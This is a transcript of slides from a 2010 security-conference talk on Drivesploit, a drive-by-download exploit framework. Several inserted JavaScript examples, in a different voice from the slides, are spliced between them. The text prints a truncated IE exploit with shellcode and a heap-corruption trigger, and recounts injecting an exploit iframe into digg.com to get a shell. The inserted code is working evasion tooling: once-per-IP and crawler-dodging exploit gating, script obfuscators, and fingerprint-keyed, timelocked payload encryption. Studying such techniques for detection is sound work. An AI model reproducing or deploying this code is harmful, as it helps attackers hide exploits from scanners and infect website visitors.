Given at Black Hat USA 2010 and DEF CON 18 (2010) by Wayne Huang and team.
https://www.defcon.org/html/defcon-18/dc-18-speakers.html#Huang
http://www.blackhat.com/html/bh-us-10/bh-us-10-briefings.html#Huang
DRIVESPLOIT: CIRCUMVENTING BOTH AUTOMATED AND MANUAL DRIVE-BY-DOWNLOAD DETECTION
This year saw the biggest news in Web security ever: Operation Aurora, which aimed at stealing source code and other intellectual property and succeeded against more than 30 companies, including Google. Incident response showed that the operation involved an IE 0-day drive-by download, resulting in Google's compromise and the leak of source code to jump points in Taiwan. The US Government was so concerned that it issued a demarche to the Chinese government.
Using real, live examples, we will show how easy it is to exploit injection-based, XSS-based, and CSRF-based vulnerabilities in Facebook, Google, Digg, LinkedIn, and other popular websites, and inject drive-by downloads.
If drive-bys are so easy to inject into high-traffic websites, then the question becomes: how easy is it to make them undetectable by automated malware scanning services (such as Google's) and by human manual inspection? We will demonstrate how easy it is to defeat automated detection mechanisms and give an overview of commonly used techniques.
We will reveal for the first time, in this conference, some very advanced techniques that have been almost impossible to overcome by automated analysis in the past, now, and in the future. We will release Drivesploit, a drive-by download exploit framework implemented on top of Metasploit. We will go into depth on two particular techniques supported by Drivesploit: a) javascript obfuscation based on behavior-based fingerprinting, and b) javascript timelock puzzles. We will have live demos to show how these techniques easily defeat both automated AND manual detection.
At the very beginning of our talk, we will give out a digg.com page which we have infected with a drive-by download created with Drivesploit. Visiting this page with the right browser will trigger the exploit and download malware that steals browser cookie files. The whole process will be undetectable by antivirus. The actual javascript drive-by code contains a secret phrase. We will give out an iPad to whoever in the audience is able to correctly deobfuscate the javascript and give out the secret phrase.
Finally, we will present case studies on systems and processes that the largest organizations have put in place in order to fight against Web-based malware. We will also present case studies of our incident response efforts with organizations hit by Web malware injections, such as Google's Aurora incident. Based in Taiwan, co-speaker Wayne has been personally involved in such incident response efforts since the late 90's.
All source code related to PoC exploits against Facebook, Google, Digg, LinkedIn, etc., as well as the source code of Drivesploit, will be released as open source at the conference.
Attendees will gain the following:
1. Understanding of drive-by downloads and associated terminology.
2. Information about various drive-by download infection vectors.
3. Appreciation of tools helpful for drive-by analysis, including Malzilla, SpiderMonkey, Rhino, Burp and Wepawet.
4. Understanding why drive-by downloads are hard to analyze and detect: why antivirus fails, why behavior-based approaches fail, and why even manual efforts are difficult.
5. Learning the Drivesploit framework and how it can be used to develop PoC drive-bys.
6. Learning two new deadly techniques: behavior-based browser fingerprinting and javascript timelock puzzles.
7. Learning how to implement the above two using Drivesploit to defeat both automated and manual drive-by analysis.
8. Knowledge about the available countermeasures to this threat.
4. Drive-by-Download Explained
• Affected websites:
– Essentially become a delivery mechanism for malware
– Appear normal
• Victims
– Do not need to "click" or "agree to" anything
– Simply connecting to the website executes the attack
5. Drive-by Download Incidents
• Aurora (Google)
– June 2009 - Feb 2010
– Targeted attack
– IE 0-day CVE-2010-0249
– Confirmed publicly by Google, Adobe Systems, Juniper Networks and RackSpace
– Total of 34 organizations targeted
6. Drive-by Download Incidents
• DNF666 Mass SQL Injection
– Since March 2010
– Jun: Adobe 0-day CVE-2010-1297
– Victims: Wall Street Journal, Jerusalem Post, etc.
– dnf666.net, robint.us, 2677.in, 4589.in, 22dnf.com
13. Dissecting Drive-By Downloads
[Diagram: Page + Browser -> Exploit -> Payload = downloader -> Exploit Server]
Script shown on the slide (the unescape("...") shellcode string and the end of the snippet are cut off on the slide; the array sss is defined in a part not shown):
<script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
var arr = new Array; for (var i = 0; i < sss.length; i++) { arr[i] = String.fromCharCode(sss[i]/7); }
var cc = arr.toString(); cc = cc.replace(/,/g, ""); cc = cc.replace(/@/g, ","); eval(cc);
var x1 = new Array(); for (i = 0; i < 200; i++) { x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; }
var e1 = null;
function ev1(evt) { e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 50); }
function ev2() { p = "
14. Dissecting Drive-By Downloads
Exploit! [same diagram and script as slide 13]
17. Dissecting Drive-By Downloads
[Diagram: Exploits / droppers -> Exploit Server -> Malware -> Malware Server -> Controller]
18. Dissecting Drive-By Downloads
But who would visit? The key now is TRAFFIC
[Diagram: Exploits / droppers -> Exploit Server -> Malware -> Malware Server -> Controller]
19. (1) Legitimate, injectable sites
[Diagram: URL Generators -> Landing Site -> Exploits / droppers -> Exploit Server -> Malware -> Malware Server -> Controller]
20. (1) Legitimate, injectable sites
[Diagram: URL Generators -> Landing Site -> Exploits / droppers -> Exploit Server -> Malware -> Malware Server, annotated:]
– May - ongoing: DNF666 mass SQL injections
– May - June: Shared hosting compromise (GoDaddy, RackSpace, Network Solutions, BlueHost, DreamHost)
– Continuous targeted attacks
21. (1) Legitimate, vulnerable sites
[Diagram: URL Generators -> Landing Site -> Exploits / droppers -> Exploit Server -> Malware -> Malware Server, annotated:]
– Mass SQL injections
– Mass hosting compromises
– Directly inside HTML / PHP / ASP
– Hidden inside WordPress files
– Hidden inside DB
– Hidden inside DB stored procedures
22. (2) Man-in-the-Middle
[Diagram: URL Generators -> Landing Site -> Exploits / droppers -> Exploit Server -> Malware -> Malware Server, with the injection point on the WAN / LAN path]
• No tampering of the website
• LAN: ARP spoofing via ZXARPS and other tools
• WAN: March 2009, in the middle of the route; tw.msn.com, taiwan.cnet.com, others
– Cisco advisory: http://tools.cisco.com/security/center/viewAlert.x?alertId=17778
26. Live demo recap
1. Inject javascript into digg.com
2. Javascript loads an iframe from our domain zcrack.org
3. Metasploit (Drivesploit) is running on zcrack.org and serves the IE iepeers exploit
4. Bypasses AV
5. IE visitor attacked, IE crashes, meterpreter starts, migrates to notepad.exe
6. We have a shell :)
27. MOTIVATION
We provide solutions that monitor websites and detect malicious content 24x7
We use multiple behavior-, heuristic-, and signature-based technologies
29. MOTIVATION
We spend a lot of time testing our own technologies, and selecting anti-virus technologies
The key is: how good are we (and they) at detecting NEW drive-by downloads
30. MOTIVATION
We need a good framework to help us replicate, manipulate, and mutate exploits found in the wild into NEW derivatives
33. Antivirus vs. Drive-bys
[Diagram: URL Generators -> Landing Site -> Exploits / droppers -> Exploit Server -> Malware -> Malware Server -> Controller]
34. Antivirus vs. Drive-bys
[Same diagram, labelled by content type: URL Generators, Landing Site and Exploits / droppers are JAVASCRIPT; Malware and Malware Server are PE BINARY]
35. Antivirus vs. Drive-bys
[Same diagram (JAVASCRIPT stages, PE BINARY stages), annotated "We will detect this part!!"]
36. Why we can't rely on PE detection
• Exploit server domains are often taken down after a few days, but the injected URL generators and the exploit servers live on
– Attack reported to the hosting provider / registrar
– Domain banned by ISPs
– Purchased duration was over
• We want to detect the injection so our customers can remove it
• Actually, statically detecting javascript exploits is quite difficult
38. JAVASCRIPT!! (ECMA-SCRIPT)
[Diagram: URL Generators -> Landing Site -> Exploits / droppers -> Exploit Server -> Malware -> Malware Server -> Controller]
39. JAVASCRIPT!! (ECMA-SCRIPT)
[Same diagram without the Malware Server stage]
40. JAVASCRIPT!! (ECMA-SCRIPT)
[Same diagram without the Malware and Malware Server stages: URL Generators -> Landing Site -> Exploits / droppers -> Exploit Server -> Controller]
41. JAVASCRIPT!! (ECMA-SCRIPT)
[Same diagram; the Exploit Server is Metasploit]
42. JAVASCRIPT!! (ECMA-SCRIPT)
[Same diagram; the Exploit Server (Metasploit) delivers the PAYLOAD: meterpreter (memory injection), so no PE binary touches disk]
43. Drive-By wants to…
• Avoid detection at the victim's desktop
• Avoid detection by UTM / gateways
• Avoid detection by automated monitors
• Live for as long as possible
45. Serve Selectively
HTTP LEVEL: serve only to:
• Fresh IPs (serve once per IP)
  set HTTP::client::onlyonce true
• Particular referer (e.g. Gumblar)
  set HTTP::referer google.com
• Particular agent string (vulnerable browser)
  set HTTP::agent::MSIE 7.0
• Black list
  set HTTP::client::blacklist false
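The gating logic behind the four options above, written out as an added example (this is not Drivesploit's code; the function names, the policy object and the sample requests are constructed for illustration, and the option names are only quoted in comments). Every enabled rule must pass before the exploit page is served; the reasons for a refusal are returned so an analyst replaying traffic can see why a scanner or a second visit got the benign page instead:

```javascript
// Added example, not Drivesploit's code: the HTTP-level gating of slide 45 as a
// plain function over request objects. makePolicy/decide and the sample requests
// are constructed for illustration.

function makePolicy(opts) {
  return {
    onlyOnce: Boolean(opts.onlyOnce),            // HTTP::client::onlyonce
    referer: opts.referer || null,               // HTTP::referer   (substring match)
    agent: opts.agent || null,                   // HTTP::agent     (substring match)
    blacklist: new Set(opts.blacklist || []),    // HTTP::client::blacklist (IPs never served)
    seen: new Set(),                             // server-side state: IPs already served once
  };
}

// Returns { serve, reasons }. `serve` is true only when every enabled rule
// passes; `reasons` lists the rules that failed, so the decision is auditable.
function decide(policy, req) {
  const hdr = (name) => req.headers[name] || '';
  const reasons = [];
  if (policy.blacklist.has(req.ip)) reasons.push('ip blacklisted');
  if (policy.onlyOnce && policy.seen.has(req.ip)) reasons.push('ip already served');
  if (policy.referer && !hdr('referer').includes(policy.referer)) reasons.push('referer mismatch');
  if (policy.agent && !hdr('user-agent').includes(policy.agent)) reasons.push('agent mismatch');
  const serve = reasons.length === 0;
  if (serve && policy.onlyOnce) policy.seen.add(req.ip);   // burn the IP: one shot per visitor
  return { serve, reasons };
}

// Constructed sample traffic (RFC 5737 documentation addresses).
const IE7 = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)';
const SAMPLE_REQUESTS = [
  { label: 'victim, first visit',  ip: '203.0.113.10', headers: { referer: 'http://www.google.com/search?q=digg', 'user-agent': IE7 } },
  { label: 'victim, second visit', ip: '203.0.113.10', headers: { referer: 'http://www.google.com/search?q=digg', 'user-agent': IE7 } },
  { label: 'crawler',              ip: '198.51.100.5', headers: { 'user-agent': 'Googlebot/2.1 (+http://www.google.com/bot.html)' } },
  { label: 'analyst, typed URL',   ip: '192.0.2.7',    headers: { 'user-agent': IE7 } },
  { label: 'known vendor IP',      ip: '192.0.2.50',   headers: { referer: 'http://www.google.com/', 'user-agent': IE7 } },
];

// Runs the sample traffic through a policy equivalent to the slide's settings
// (onlyonce true, referer google.com, agent MSIE 7.0, plus one blacklisted IP).
function runSample() {
  const policy = makePolicy({ onlyOnce: true, referer: 'google.com', agent: 'MSIE 7.0', blacklist: ['192.0.2.50'] });
  return SAMPLE_REQUESTS.map((req) => ({ label: req.label, ...decide(policy, req) }));
}
```

Only the first request is served. The practical consequence for analysis is the one slide 103 spells out: a second fetch from the same address, a fetch without the expected referer, or a fetch with a crawler's agent string all receive the benign page, so the first response a monitor sees from a fresh IP with a matching browser profile is the only copy of the exploit it will get.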
53. JAVASCRIPT EXPLOIT DISSECTION
[Diagram: Obfuscated blob -> De-obfuscator -> Primitive form (Shellcode, Heapspray, Memory-corruption Trigger) -> Obfuscated form]
54. Dissecting Drive-By Downloads
Exploit! [same diagram and script as slide 13]
55. JAVASCRIPT EXPLOIT DISSECTION
[Same diagram as slide 53, annotated "Start" at the obfuscated blob]
56. JAVASCRIPT EXPLOIT DISSECTION
[Same diagram, annotated "Start" and "Mutate" (at the primitive form)]
57. JAVASCRIPT EXPLOIT DISSECTION
[Same diagram, annotated "Start", "Mutate" and "Prevent" (at the obfuscated form)]
59. 1. Javascript Random Variable Auto Replacement
• Accepts a piece of javascript
• Parses the javascript according to its grammar
• Auto-replaces all variable names and function names with random names
• Passes back:
a) the new javascript
b) a vector of old-new name mappings
60. 1. Javascript Random Variable Auto Replacement
randomized = Rex::Exploitation::DriveSploit::obfuscatejs(js, Rex::Exploitation::DriveSploit::AUTO_RANDOM_VARS)
61. 2. Javascript Concat String Obfuscation
arr = Rex::Exploitation::DriveSploit.obfuscatejs(shellcode, Rex::Exploitation::DriveSploit::STRING_CONCAT)
shellcode_script = arr[0]
shellcode_var = arr[1]
66. 3. Javascript Random Text Insertion
insertret = Rex::Exploitation::DriveSploit.getInsertion(shellcode, 4, 6, 10)
shellcode = insertret[0]
random_insertion_string = insertret[1]
67. 3. Javascript Random Text Insertion
insertret = Rex::Exploitation::DriveSploit.getInsertion(shellcode, 4, 6, 10)
# insert a fixed 6-character random string, for every 4-8 characters
returns
a) a piece of javascript containing the injected string
b) Javascript variable name containing the reverted, original string
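The three transforms of slides 59 to 67, as an added example written in plain JavaScript rather than the Ruby API above (this is not Drivesploit's code; the function names, the seedable RNG and the SAMPLE script are constructed for illustration, and the identifier scanner is regex-based rather than a real parser). Each function returns the same shape the slides describe: the rewritten source plus the name mapping, or the emitted script plus the variable that holds the original string at run time:

```javascript
// Added example, not Drivesploit's code: random variable replacement, string
// concatenation and random text insertion (slides 59-67) in plain JavaScript.

// Seedable RNG (mulberry32) so results are reproducible; Math.random also works.
function seededRng(seed) {
  let a = seed >>> 0;
  return function () {
    a = (a + 0x6d2b79f5) >>> 0;
    let t = Math.imul(a ^ (a >>> 15), a | 1);
    t ^= t + Math.imul(t ^ (t >>> 7), t | 61);
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296;
  };
}

const ALPHA = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
function randomLetters(rng, len) {
  let s = '';
  for (let i = 0; i < len; i++) s += ALPHA[Math.floor(rng() * ALPHA.length)];
  return s;
}

// Split source into [code, string, code, string, ...] so string literals are
// never rewritten. Comments and regex literals are not handled: keep them out.
function splitStrings(src) {
  return src.split(/("(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*')/);
}

// 1. Random variable replacement: every name declared with var/let/const/function,
// plus function parameters, gets a fresh random identifier. Returns
// [newSource, { oldName: newName }] as on slide 59.
function renameIdentifiers(src, rng = Math.random) {
  const parts = splitStrings(src);
  const code = parts.filter((_, i) => i % 2 === 0).join(' ');
  const names = new Set();
  for (const m of code.matchAll(/\b(?:var|let|const|function)\s+([A-Za-z_$][\w$]*)/g)) names.add(m[1]);
  for (const m of code.matchAll(/\bfunction\b[^(]*\(([^)]*)\)/g)) {
    for (const p of m[1].split(',')) if (p.trim()) names.add(p.trim());
  }
  const mapping = {};
  const used = new Set(names);
  for (const name of names) {
    let fresh;
    do { fresh = '_' + randomLetters(rng, 6); } while (used.has(fresh) || src.includes(fresh));
    used.add(fresh);
    mapping[name] = fresh;
  }
  const out = parts.map((seg, i) => {
    if (i % 2 === 1) return seg;                         // string literal: untouched
    for (const [oldName, newName] of Object.entries(mapping)) {
      // whole-token match that skips property accesses such as obj.name
      const re = new RegExp('(?<![.\\w$])' + oldName.replace(/\$/g, '\\$') + '(?![\\w$])', 'g');
      seg = seg.replace(re, newName);
    }
    return seg;
  }).join('');
  return [out, mapping];
}

// 2. String concatenation: break a string into random 1-4 character pieces
// joined with "+". Returns [script, varName] as on slide 61.
function concatObfuscateString(str, rng = Math.random) {
  const pieces = [];
  for (let i = 0; i < str.length;) {
    const n = 1 + Math.floor(rng() * 4);
    pieces.push(JSON.stringify(str.slice(i, i + n)));
    i += n;
  }
  if (pieces.length === 0) pieces.push('""');
  const v = '_' + randomLetters(rng, 6);
  return [`var ${v} = ${pieces.join(' + ')};`, v];
}

// 3. Random text insertion: a fixed random marker is inserted after every
// gapMin..gapMax characters and stripped again by the emitted script.
// Returns [script, varNameHoldingOriginal] as on slide 67.
function randomInsertion(str, gapMin, gapMax, markerLen, rng = Math.random) {
  let marker;
  do { marker = randomLetters(rng, markerLen); } while (str.includes(marker));
  let salted = '';
  for (let i = 0; i < str.length;) {
    const gap = gapMin + Math.floor(rng() * (gapMax - gapMin + 1));
    salted += str.slice(i, i + gap) + marker;
    i += gap;
  }
  const raw = '_' + randomLetters(rng, 6);
  let clean;
  do { clean = '_' + randomLetters(rng, 6); } while (clean === raw);
  return [`var ${raw} = ${JSON.stringify(salted)}; var ${clean} = ${raw}.split(${JSON.stringify(marker)}).join("");`, clean];
}

// Indirect eval: runs a script and returns the value of its last statement.
function runScript(src) { return (0, eval)(src); }

const SAMPLE = 'var greeting = "hi"; function shout(msg) { return msg + "!"; } shout(greeting);';

function demo(seed = 1) {
  const rng = seededRng(seed);
  const [renamed, mapping] = renameIdentifiers(SAMPLE, rng);
  const [concatScript, concatVar] = concatObfuscateString('%u9090%u19eb', rng);
  const [insertScript, cleanVar] = randomInsertion('%u9090%u19eb', 4, 8, 6, rng);
  return {
    renamed, mapping, concatScript, insertScript,
    original: runScript(SAMPLE),
    renamedResult: runScript(renamed),
    concatResult: runScript(concatScript + ' ' + concatVar),
    insertResult: runScript(insertScript + ' ' + cleanVar),
  };
}
```

demo() shows the point of slide 101: none of the three outputs contains a byte sequence that could be signatured, yet each evaluates to exactly the original, and the same seed regenerates a different but equivalent variant on every change of seed.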
83. ANTIVIRUS DESKTOP VERSION
• Can monitor host environment
– Hook into browsers
– Easier to get raw form of exploit
• Behavior analysis
– Buffer overflow behavior
– Download-to-file behavior
94. 5. Fingerprinting-Based Encryption Summary
• "This exploit works only for IE6"
• "Give me an encrypted version of my javascript exploit"
• "Give me javascript to generate the decoding key"
• "The key is only correctly generated if the javascript is run under IE6"
98. Why not Anti-Virus?
• AV is installed on desktops / notebooks
• Complicated normal behaviors
• Strict resource constraints
• Therefore, AV and gateway vendors rely on:
– Signature-based pattern matching technologies
– LIGHTWEIGHT and ACCURATE
• Why can't such technology be used to detect drive-by-downloads?
100. … so they are usually not reused
AV is no good because drive-by-downloads are in:
• Disposable Javascript
• Disposable PDF (Adobe JS)
• Disposable Flash ActionScript
• All ECMAScripts; you don't usually reuse them…
101. Javascript Packing Is a Norm
• Packing is widely used by legitimate code!
– To protect javascript source code
– To reduce javascript size
• Google Closure Compiler
– http://code.google.com/closure/compiler/
• Yahoo Javascript Packer (YUI Compressor)
– http://developer.yahoo.com/yui/compressor/
• Advanced HTML Protector
– http://www.creabit.com/htmlprotect/
• Dean Edwards' Packer
– http://dean.edwards.name/packer/
• Online JS Obfuscator
– http://www.iwebtool.com/html_encrypter
• http://www.cha88.cn/safe/fromCharCode.php
102. … OK so AV doesn't work (that well)…
How about behavior-based approaches?
103. Defeating Behavior Analysis
1. Use VBScript
– Exploits in VBScript
– URL generators in VBScript
– Exploits in / generated by VBScript
– May defeat SpiderMonkey et al (Rhino, JSunPack, etc)
2. Don't serve to detectors
– You can't detect what you don't have
– Serve to each IP only once
– Detect agent strings
– Collect robot IPs: Google, Yahoo, security vendors
104. Defeating Behavior Analysis
3. Fingerprint-based encryption
4. Little but effective techniques
– Sleep(30000); // using setTimeout
– Timelock puzzles
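Fingerprinting-based encryption (slide 94) and the timelock puzzle (slide 104) fit together, and one added example shows both (this is not Drivesploit's code; the FNV-1a hash, the XOR keystream, the `env` objects standing in for navigator/document and the harmless stand-in payload are all constructed for illustration, and the hash and cipher are toys, not something to build real cryptography on). The generator derives the key from the fingerprint of the one browser the exploit targets; the decoder that ships in the page recomputes it from the live environment, and chains the hash many times so that the key cannot be reached quickly:

```javascript
// Added example, not Drivesploit's code: fingerprint-keyed encryption with a
// timelock key derivation. Toy primitives, harmless payload, constructed envs.

// 32-bit FNV-1a; the only primitive the decoder needs, so it ships as a few lines.
function fnv1a(str) {
  let h = 0x811c9dc5;
  for (let i = 0; i < str.length; i++) {
    h ^= str.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h;
}

// Behavior-based fingerprint: the generator evaluates these against its model of
// the target; the decoder evaluates the same expressions live in the visitor's
// browser (comments show what each field would be read from in a real page).
function fingerprint(env) {
  return [
    env.userAgent,                           // navigator.userAgent
    String(env.hasActiveX),                  // typeof ActiveXObject !== "undefined"
    String(env.documentMode),                // document.documentMode
    env.plugins.slice().sort().join('|'),    // navigator.plugins names
  ].join('\n');
}

// Timelock: the key is the hash chained `rounds` times. Each round depends on
// the previous one, so the work is inherently sequential; an analyzer that
// enforces a time budget (`deadline`, ms since epoch) gives up and gets null.
function deriveKey(fp, rounds, deadline = Infinity) {
  let h = fnv1a(fp);
  for (let i = 0; i < rounds; i++) {
    if (i % 1024 === 0 && Date.now() >= deadline) return null;
    h = fnv1a(fp + ':' + h.toString(16));
  }
  return h;
}

function keystreamByte(key, i) { return fnv1a(key.toString(16) + ':' + i) & 0xff; }

function encrypt(plaintext, key) {
  const out = [];
  for (let i = 0; i < plaintext.length; i++) out.push(plaintext.charCodeAt(i) ^ keystreamByte(key, i));
  return out;
}

function decrypt(bytes, key) {
  let s = '';
  for (let i = 0; i < bytes.length; i++) s += String.fromCharCode(bytes[i] ^ keystreamByte(key, i));
  return s;
}

// Generator side: "this exploit works only for IE6", so the key comes from the
// IE6 fingerprint. Only BLOB, ROUNDS and the decoder functions would reach the page.
const TARGET_ENV   = { userAgent: 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', hasActiveX: true,  documentMode: undefined, plugins: [] };
const ANALYZER_ENV = { userAgent: 'Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.6', hasActiveX: false, documentMode: undefined, plugins: ['Shockwave Flash'] };
const ROUNDS  = 100000;
const PAYLOAD = 'alert("decoded only in the intended browser")';   // stand-in, not an exploit
const BLOB    = encrypt(PAYLOAD, deriveKey(fingerprint(TARGET_ENV), ROUNDS));

// Decoder side: recompute the key from the live environment. A wrong environment
// yields garbage rather than a script; a sandbox that stops after `budgetMs`
// never reaches the key at all. Returns the decoded string or null on timeout.
function decodeInEnvironment(env, budgetMs = Infinity) {
  const key = deriveKey(fingerprint(env), ROUNDS, Date.now() + budgetMs);
  return key === null ? null : decrypt(BLOB, key);
}
```

Two things follow for anyone analysing such a sample. The plaintext never appears on the wire and cannot be recovered from the decoder alone; the analyst either runs it in a browser whose fingerprint matches exactly, or enumerates candidate fingerprints and lets the chained derivation run to completion for each. And unlike the setTimeout-based sleep on the same slide, which a sandbox can fast-forward by hooking timers, the timelock is CPU-bound, so the only way past it is to wait.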
105. Future Work
• Randomly chop up scripts and split into individual files
• Generating VBScript instead of javascript
• Encrypting using data existing outside of HTML
– HTTP headers
106. Discussion
• The Panopticlick experiment by Eckersley of EFF
– 94.2% of "typical desktop browsers" are unique
• Can fingerprinting-based encryption be integrated with this type of individual fingerprinting, to prevent detection and analysis of targeted attacks?
108. References
• James Lee, Using guided missiles in drive-bys
http://www.slideshare.net/egypt/using-guided-missiles-in-drivebys-automatic-browser-fingerprinting-and-exploitation-with-the-metasploit-frameworks-browser-autopwn
• Sebastian Porst, How to really obfuscate your PDF malware
http://www.slideshare.net/cblichmann/how-to-really-obfuscate-your-pdf-malware
• Jeremy Chiu, 0box analyzer: afterdark runtime forensics for automated malware analysis and clustering
http://www.slideshare.net/wayne_armorize/0-box-analyzer-afterdark-runtime-forensics-for-automated-malware-analysis-and-clustering-2
• HeapLib support added to Metasploit 3
http://blog.metasploit.com/2007/04/heaplib-support-added-to-metasploit-3.html